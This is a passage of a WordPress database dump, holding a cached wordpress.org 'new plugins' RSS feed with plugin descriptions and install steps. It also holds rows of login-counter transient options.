+0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/plugins/give-to-zbs-crm-connector/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"Give to ZBS CRM connector connects your GiveWP donations to your Zero BS CRM. Keep&#8230;\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"mikemayhem3030\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1524:\"<p><!--section=description--></p>\n<p>Never miss a donation again by capturing your donations into Zero BS CRM. Manage your donors just like you&#8217;d manage your customers. Follow up with your Donors by utilising Zero BS CRM&#8217;s management tools to keep your donors happy.</p>\n<h4>Utilise all the features of Zero BS CRM</h4>\n<p>You are running Give and want to power up your management of the people who donate to your cause. Enter Zero BS CRM. Through using Give to ZBS you can capture your Donors into your ZBS CRM.</p>\n<p>Capture<br />\n* Donor information<br />\n* First Name<br />\n* Last Name<br />\n* Email<br />\n* Donor History</p>\n<p>Use the information with your CRM since Donors are captured as Contacts to your CRM. You can then use the wider features of Zero BS CRM such as</p>\n<ul>\n<li>View your Donations Sales in the Sales Dashboard. <a href=\"https://www.youtube.com/watch?v=ju2aeLkrxcM\" rel=\"nofollow\">A tour of the ZBS CRM Sales Dashboard</a></li>\n<li>Email your Donors based on certain criteria</li>\n<li>Tag your Donors and quickly filter them</li>\n</ul>\n<p><!--section=installation--></p>\n<ul>\n<li>WordPress 4.0 or greater</li>\n<li>PHP version 5.3 or greater</li>\n<li>MySQL version 5.0.15 or greater</li>\n</ul>\n<p><!--section=changelog--></p>\n<h4>1.0: July 11th, 2017</h4>\n<p>Initial Release</p>\n<p><!--section=faq--></p>\n<dl>\n<dt>Installation Instructions</dt>\n<dd>\n<ul>\n<li>WordPress 4.0 or greater</li>\n<li>PHP version 5.3 or greater</li>\n<li>MySQL version 5.0.15 or greater</li>\n</ul>\n</dd>\n</dl>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n		\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"EmailScrambler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"https://wordpress.org/plugins/emailscrambler/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Jul 2017 19:16:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"https://wordpress.org/plugins/emailscrambler/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"A lightweight plugin to protect email addresses from email-harvesting\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Daschmi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:730:\"<p><!--section=description--></p>\n<p>A lightweight plugin to protect email addresses from email-harvesting. Replace all @ in content with (at) and protect the E-Mail adress with javascript. Inspired by TYPO3.</p>\n<p><!--section=installation--></p>\n<ol>\n<li>Upload to the <code>/wp-content/plugins/</code> directory</li>\n<li>Activate the plugin through the &#8216;Plugins&#8217; menu in WordPress</li>\n</ol>\n<p><!--section=changelog--></p>\n<h4>1.0</h4>\n<ul>\n<li>Initial release</li>\n</ul>\n<p><!--section=faq--></p>\n<dl>\n<dt>Installation Instructions</dt>\n<dd>\n<ol>\n<li>Upload to the <code>/wp-content/plugins/</code> directory</li>\n<li>Activate the plugin through the &#8216;Plugins&#8217; menu in WordPress</li>\n</ol>\n</dd>\n</dl>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n		\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"WP AMP Themes – Plugin for Accelerated Mobile Pages templates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"https://wordpress.org/plugins/wp-amp-themes/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Jul 2017 18:29:12 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"https://wordpress.org/plugins/wp-amp-themes/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:117:\"WP AMP Themes helps you improve mobile user engagement with fast, compelling experiences. Discover Accelerated&#8230;\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"anghelalexandra\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:8690:\"<p><!--section=description--></p>\n<p>The Accelerated Mobile Pages (&#8220;AMP&#8221;) Project is an open source initiative that came out of discussions between publishers and technology companies about the need to improve the entire mobile content ecosystem for everyone — publishers, consumer platforms, creators, and users.</p>\n<p>Today, the expectation is that content should load super fast and be easy to explore. The reality is that content can take several seconds to load, or, because the user abandons the slow page, never fully loads at all. Accelerated Mobile Pages are web pages designed to load near instantaneously — they are a step towards a better mobile web for all.</p>\n<p>Speed matters and instant is the ideal. Research has shown higher bounce rates associated with slower-loading web pages. Using the AMP format will make it far more compelling for people to consume and engage with more content. But this isn’t just about speed and performance. We also want to promote enhanced distribution so that publishers can take advantage of the open web’s potential for their content to appear everywhere quickly — across platforms and apps — which can lead to more revenue via ads and subscriptions.</p>\n<p>Accelerated Mobile Pages are just like any other HTML page, but with a limited set of allowed technical functionality that is defined and governed by the open source AMP spec. Just like all web pages, Accelerated Mobile Pages will load in any modern browser or app webview.</p>\n<p>AMP files take advantage of various technical and architectural approaches that prioritize speed to provide a faster experience for users. AMP developers can use a rich and growing library of web components that offer the ability to embed rich media objects like video and social posts, display advertising, or collect analytics. The goal is not to homogenize how content looks and feels, but instead to build a more common technical core between pages that speeds up load times.</p>\n<p>In addition, AMP files can be cached in the cloud in order to reduce the time content takes to get to a user’s mobile device. By using the AMP format, content producers are making the content in AMP files available to be cached by third parties. Under this type of framework, publishers continue to control their content, but platforms can easily cache or mirror the content for optimal delivery speed to users. Google has provided the Google AMP Cache that can be used by anyone at no cost, and all AMPs will be cached by the Google AMP Cache. Other companies may build their own AMP cache as well.</p>\n<p>In summary, the goal is that the combination of limited technical functionality with a distribution system built around caching will lead to better performing pages, and increased audience development for publishers.</p>\n<p>The WordPress Accelerated Mobile Pages Themes plugin helps bloggers, publishers and other content creators to easily add AMP support to their WordPress websites. The WP AMP Themes plugin includes one FREE AMP theme (OBLIQ) which is customizable (colors, fonts, appearance) via the WordPress admin area.</p>\n<p>The OBLIQ AMP theme (available for FREE) comes with support for post details and includes a side menu with categories and pages.</p>\n<p>Some of the AMP components that we&#8217;ve used when building OBLIQ:</p>\n<ul>\n<li>amp-accordion</li>\n<li>amp-img</li>\n<li>amp-sidebar</li>\n<li>amp-carousel</li>\n<li>amp-social-share</li>\n</ul>\n<p>There are dozens of premium AMP themes available at AMPThemes.io: <a href=\"https://ampthemes.io/downloads/base-amp-theme/\" rel=\"nofollow\">BASE</a>, <a href=\"https://ampthemes.io/downloads/elevate-amp-theme/\" rel=\"nofollow\">ELEVATE</a>, <a href=\"https://ampthemes.io/downloads/folio-amp-theme/\" rel=\"nofollow\">FOLIO</a>, <a href=\"https://ampthemes.io/downloads/invision-amp-theme/\" rel=\"nofollow\">INVISION</a>, <a href=\"https://ampthemes.io/downloads/popsicle-amp-theme/\" rel=\"nofollow\">POPSICLE</a>, <a href=\"https://ampthemes.io/downloads/pulse-amp-theme/\" rel=\"nofollow\">PULSE</a>, <a href=\"https://ampthemes.io/downloads/ghost-amp-theme/\" rel=\"nofollow\">GHOST</a>, <a href=\"https://ampthemes.io/downloads/phantom-amp-theme/\" rel=\"nofollow\">PHANTOM</a>, <a href=\"https://ampthemes.io/downloads/lucid-amp-theme/\" rel=\"nofollow\">LUCID</a>, <a href=\"https://ampthemes.io/downloads/extrude-amp-theme/\" rel=\"nofollow\">EXTRUDE</a>, <a href=\"https://ampthemes.io/downloads/vedi-amp-theme/\" rel=\"nofollow\">VEDI</a>, <a href=\"https://ampthemes.io/downloads/blend-amp-theme/\" rel=\"nofollow\">BLEND</a>, <a href=\"https://ampthemes.io/downloads/pure-amp-theme/\" rel=\"nofollow\">PURE</a>, <a href=\"https://ampthemes.io/downloads/gotham-amp-theme/\" rel=\"nofollow\">GOTHAM</a>, <a href=\"https://ampthemes.io/downloads/future-amp-theme/\" rel=\"nofollow\">FUTURE</a> &amp; <a href=\"https://ampthemes.io/downloads/palm-amp-theme/\" rel=\"nofollow\">PALM</a>.</p>\n<p>Have fun on your mobile adventures!</p>\n<h3>Repositories</h3>\n<p>Here&#8217;s our Github development repository:<br />\n* <a href=\"https://github.com/appticles/wp-amp-themes\" rel=\"nofollow\">https://github.com/appticles/wp-amp-themes</a> &#8211; The plugin files, same as you will find for download on WordPress.org.</p>\n<p><!--section=installation--></p>\n<h4>Simple installation for WordPress v4.4 and later</h4>\n<p>This plugin requires the <a href=\"https://wordpress.org/plugins/amp/\">AMP plugin</a> to be installed.</p>\n<ol>\n<li>Go to the &#8216;Plugins&#8217; / &#8216;Add new&#8217; menu</li>\n<li>Upload wp-amp-themes.zip then press &#8216;Install now&#8217;.</li>\n<li>Enjoy.</li>\n</ol>\n<h4>Comprehensive setup</h4>\n<p>A more comprehensive setup process and guide to configuration is as follows.</p>\n<ol>\n<li>Locate your WordPress install on the file system</li>\n<li>Extract the contents of <code>wp-amp-themes.zip</code> into <code>wp-content/plugins</code></li>\n<li>In <code>wp-content/plugins</code> you should now see a directory named <code>wp-amp-themes</code></li>\n<li>Login to the WordPress admin panel at <code>http://yoursite.com/wp-admin</code></li>\n<li>Go to the &#8216;Plugins&#8217; menu.</li>\n<li>Click &#8216;Activate&#8217; for the plugin.</li>\n<li>Go to the ‘WP AMP Themes&#8217; admin panel.</li>\n<li>Edit your settings.</li>\n<li>You&#8217;re all done!</li>\n</ol>\n<h4>Testing your installation</h4>\n<p>Open a post details page and add &#8216;/amp&#8217; at the end of the URL. You should see the AMP template being displayed.</p>\n<p>Once your AMP posts are cached by Google, they can be easily recognized on mobile devices by the AMP lightning symbol that shows up next to them in the Google search results.</p>\n<p>If a user clicks on an AMP link, the AMP content is loaded directly in the browser from the Google AMP Cache.<br />\nAfter viewing the AMP page, users can click on links in the article or return to Google search by clicking the back arrow.</p>\n<p><!--section=changelog--></p>\n<h4>0.5</h4>\n<ul>\n<li>Beta release</li>\n</ul>\n<p><!--section=faq--></p>\n<dl>\n<dt>Installation Instructions</dt>\n<dd>\n<h4>Simple installation for WordPress v4.4 and later</h4>\n<p>This plugin requires the <a href=\"https://wordpress.org/plugins/amp/\">AMP plugin</a> to be installed.</p>\n<ol>\n<li>Go to the &#8216;Plugins&#8217; / &#8216;Add new&#8217; menu</li>\n<li>Upload wp-amp-themes.zip then press &#8216;Install now&#8217;.</li>\n<li>Enjoy.</li>\n</ol>\n<h4>Comprehensive setup</h4>\n<p>A more comprehensive setup process and guide to configuration is as follows.</p>\n<ol>\n<li>Locate your WordPress install on the file system</li>\n<li>Extract the contents of <code>wp-amp-themes.zip</code> into <code>wp-content/plugins</code></li>\n<li>In <code>wp-content/plugins</code> you should now see a directory named <code>wp-amp-themes</code></li>\n<li>Login to the WordPress admin panel at <code>http://yoursite.com/wp-admin</code></li>\n<li>Go to the &#8216;Plugins&#8217; menu.</li>\n<li>Click &#8216;Activate&#8217; for the plugin.</li>\n<li>Go to the ‘WP AMP Themes&#8217; admin panel.</li>\n<li>Edit your settings.</li>\n<li>You&#8217;re all done!</li>\n</ol>\n<h4>Testing your installation</h4>\n<p>Open a post details page and add &#8216;/amp&#8217; at the end of the URL. You should see the AMP template being displayed.</p>\n<p>Once your AMP posts are cached by Google, they can be easily recognized on mobile devices by the AMP lightning symbol that shows up next to them in the Google search results.</p>\n<p>If a user clicks on an AMP link, the AMP content is loaded directly in the browser from the Google AMP Cache.<br />\nAfter viewing the AMP page, users can click on links in the article or return to Google search by clicking the back arrow.</p>\n</dd>\n</dl>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n		\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"Adtoniq for Google Analytics\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://wordpress.org/plugins/adtoniq-for-google-analytics/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Jul 2017 16:34:12 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://wordpress.org/plugins/adtoniq-for-google-analytics/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"Assure accurate Google Analytics data.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"davidadtoniq\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1953:\"<p><!--section=description--></p>\n<p>Adtoniq For Google Analytics allows WordPress sites to make full use of Google Analytics even with their blocked audience, and also allows customers to segment their audience into blocked and non-blocked users.</p>\n<p>Highlights:</p>\n<h4>Get the full picture</h4>\n<p>Ensures that all the same Google Analytics data is collected for both non-blocked and blocked users alike.</p>\n<h4>Uses your Google Analytics account</h4>\n<p>Works with your own Google Analytics account. If you don&#8217;t have one, we can help you get set up.</p>\n<h4>Uses custom dimensions for reporting</h4>\n<p>Uses custom dimensions for reporting, so you can understand differences in behaviour and demographics between your blocked and unblocked web.</p>\n<h4>Supports traffic splitting</h4>\n<p>Supports traffic splitting so you can stay within the Google Analytics quota.</p>\n<h4>On-Call Expert Customer Support and Consultation Services</h4>\n<p>Contact Adtoniq at support@adtoniq.com, or call us at 415.340.1949.</p>\n<p><!--section=installation--></p>\n<p>This plugin requires that you first install and activate the <a href=\"https://wordpress.org/plugins/adtoniq/\">Adtoniq plugin</a> plugin. After installing that,<br />\ninstall and activate this plugin. Click to the Adtoniq for Google Analytics admin page and enter your Google Analytics property ID, traffic split,<br />\nand check the box if you want Google Analytics to work even with ad blockers.</p>\n<p><!--section=faq--></p>\n<dl>\n<dt>Installation Instructions</dt>\n<dd>\n<p>This plugin requires that you first install and activate the <a href=\"https://wordpress.org/plugins/adtoniq/\">Adtoniq plugin</a> plugin. After installing that,<br />\ninstall and activate this plugin. Click to the Adtoniq for Google Analytics admin page and enter your Google Analytics property ID, traffic split,<br />\nand check the box if you want Google Analytics to work even with ad blockers.</p>\n</dd>\n</dl>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n		\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"5 Star Google Reviews\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"https://wordpress.org/plugins/5-star-google-reviews/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Jul 2017 16:22:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"https://wordpress.org/plugins/5-star-google-reviews/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"This lightweight plugin will display a review form on your website. If the user leaves&#8230;\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Joseph Stevenson\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1514:\"<p><!--section=description--></p>\n<p>This lightweight plugin will display a review form on your website. If the user leaves a 5 star review they will be forwarded to your google business, facebook or yelp page. Any reviews with 4 stars or less will be shown an apology page from you.</p>\n<p>Perfect to get feedback from customers without complaints going straight to your google business, facebook or yelp pages.</p>\n<p><!--section=installation--></p>\n<ol>\n<li>Upload the <code>5-star-reviews</code> folder to the <code>/wp-content/plugins/</code> directory</li>\n<li>Activate the plugin through the &#8216;Plugins&#8217; menu in WordPress</li>\n<li>Manage through the &#8216;5 Star Reviews Link&#8217; in WordPress Admin</li>\n</ol>\n<p><!--section=faq--></p>\n<dl>\n<dt>Installation Instructions</dt>\n<dd>\n<ol>\n<li>Upload the <code>5-star-reviews</code> folder to the <code>/wp-content/plugins/</code> directory</li>\n<li>Activate the plugin through the &#8216;Plugins&#8217; menu in WordPress</li>\n<li>Manage through the &#8216;5 Star Reviews Link&#8217; in WordPress Admin</li>\n</ol>\n</dd>\n<dt>How do I add the form to my page?</dt>\n<dd>\n<p>Use the shortcode [FiveStar] to post the form on any page or widget</p>\n</dd>\n</dl>\n<p><!--section=changelog--></p>\n<h4>0.1</h4>\n<ul>\n<li>First official release</li>\n</ul>\n<h4>0.2</h4>\n<ul>\n<li>Attribution Change</li>\n</ul>\n<h4>0.3</h4>\n<ul>\n<li>Change to only show review sites that have urls entered into settings</li>\n</ul>\n<h4>0.4</h4>\n<ul>\n<li>Code Condensing</li>\n</ul>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:46:\"https://wordpress.org/plugins/browse/new/feed/\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"hourly\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:10:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Sun, 16 Jul 2017 07:56:20 GMT\";s:12:\"content-type\";s:34:\"application/rss+xml; charset=UTF-8\";s:10:\"connection\";s:5:\"close\";s:25:\"strict-transport-security\";s:11:\"max-age=360\";s:6:\"x-olaf\";s:3:\"⛄\";s:13:\"last-modified\";s:29:\"Sun, 16 Jul 2017 07:40:42 GMT\";s:4:\"link\";s:66:\"<https://wordpress.org/plugins/wp-json/>; rel=\"https://api.w.org/\"\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:11:\"HIT lax 249\";}s:5:\"build\";s:14:\"20131027142243\";}', 'no');
INSERT INTO `www2_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(64530, '_transient_timeout_wflginfl_621805641', '1453591335', 'no'),
(64531, '_transient_wflginfl_621805641', '19', 'no'),
(64543, '_transient_timeout_wflginfl_712311272', '1453615784', 'no'),
(64544, '_transient_wflginfl_712311272', '19', 'no'),
(64580, '_transient_timeout_wflginfl_2734619176', '1453666260', 'no'),
(64581, '_transient_wflginfl_2734619176', '19', 'no'),
(64582, '_transient_timeout_wflginfl_3286417434', '1453666265', 'no'),
(64583, '_transient_wflginfl_3286417434', '19', 'no'),
(73985, '_transient_timeout_wflginfl_3258972651', '1462983015', 'no'),
(70808, '_transient_timeout_wflginfl_3321982646', '1460401668', 'no'),
(70809, '_transient_wflginfl_3321982646', '19', 'no'),
(73986, '_transient_wflginfl_3258972651', '19', 'no'),
(64589, '_transient_timeout_wflginfl_3233350765', '1453666310', 'no'),
(64590, '_transient_wflginfl_3233350765', '19', 'no'),
(64591, '_transient_timeout_wflginfl_2499494675', '1453666311', 'no'),
(64592, '_transient_wflginfl_2499494675', '19', 'no'),
(75232, '_transient_timeout_wflginfl_3325711406', '1463838874', 'no'),
(75233, '_transient_wflginfl_3325711406', '19', 'no'),
(64595, '_transient_timeout_wflginfl_1346451984', '1453666371', 'no'),
(64596, '_transient_wflginfl_1346451984', '19', 'no'),
(64597, '_transient_timeout_wflginfl_3233350729', '1453666382', 'no'),
(64598, '_transient_wflginfl_3233350729', '19', 'no'),
(64599, '_transient_timeout_wflginfl_2733835464', '1453666380', 'no'),
(64600, '_transient_wflginfl_2733835464', '19', 'no'),
(69967, '_transient_timeout_wflginfl_3473364076', '1460010820', 'no'),
(69968, '_transient_wflginfl_3473364076', '19', 'no'),
(70199, '_transient_timeout_wflginfl_2960597542', '1460034044', 'no'),
(70200, '_transient_wflginfl_2960597542', '19', 'no'),
(64607, '_transient_timeout_wflginfl_3321974368', '1453666405', 'no'),
(64608, '_transient_wflginfl_3321974368', '19', 'no'),
(69272, '_transient_timeout_wflginfl_3244162394', '1459728362', 'no'),
(69273, '_transient_wflginfl_3244162394', '19', 'no'),
(64611, '_transient_timeout_wflginfl_3645054499', '1453666424', 'no'),
(64612, '_transient_wflginfl_3645054499', '19', 'no'),
(64613, '_transient_timeout_wflginfl_2420940008', '1453666420', 'no'),
(64614, '_transient_wflginfl_2420940008', '19', 'no'),
(64621, '_transient_timeout_wflginfl_1411834374', '1453666436', 'no'),
(64622, '_transient_wflginfl_1411834374', '19', 'no'),
(64623, '_transient_timeout_wflginfl_1540872227', '1453666442', 'no'),
(64624, '_transient_wflginfl_1540872227', '19', 'no'),
(64625, '_transient_timeout_wflginfl_3237935775', '1453666447', 'no'),
(64626, '_transient_wflginfl_3237935775', '19', 'no'),
(70612, '_transient_timeout_wflginfl_1534660556', '1460326275', 'no'),
(70613, '_transient_wflginfl_1534660556', '19', 'no'),
(64629, '_transient_timeout_wflginfl_2548839245', '1453666448', 'no'),
(64630, '_transient_wflginfl_2548839245', '19', 'no'),
(64631, '_transient_timeout_wflginfl_3233350704', '1453666443', 'no'),
(64632, '_transient_wflginfl_3233350704', '19', 'no'),
(64633, '_transient_timeout_wflginfl_3325670416', '1453666459', 'no'),
(64634, '_transient_wflginfl_3325670416', '19', 'no'),
(64637, '_transient_timeout_wflginfl_1540067374', '1453666459', 'no'),
(64638, '_transient_wflginfl_1540067374', '19', 'no'),
(64639, '_transient_timeout_wflginfl_3582290625', '1453666471', 'no'),
(64640, '_transient_wflginfl_3582290625', '19', 'no'),
(64641, '_transient_timeout_wflginfl_3582290555', '1453666469', 'no'),
(64642, '_transient_wflginfl_3582290555', '19', 'no'),
(74992, '_transient_timeout_wflginfl_3290980763', '1463733384', 'no'),
(74993, '_transient_wflginfl_3290980763', '19', 'no'),
(64645, '_transient_timeout_wflginfl_1729096338', '1453666480', 'no'),
(64646, '_transient_wflginfl_1729096338', '19', 'no'),
(64647, '_transient_timeout_wflginfl_1163468750', '1453666503', 'no'),
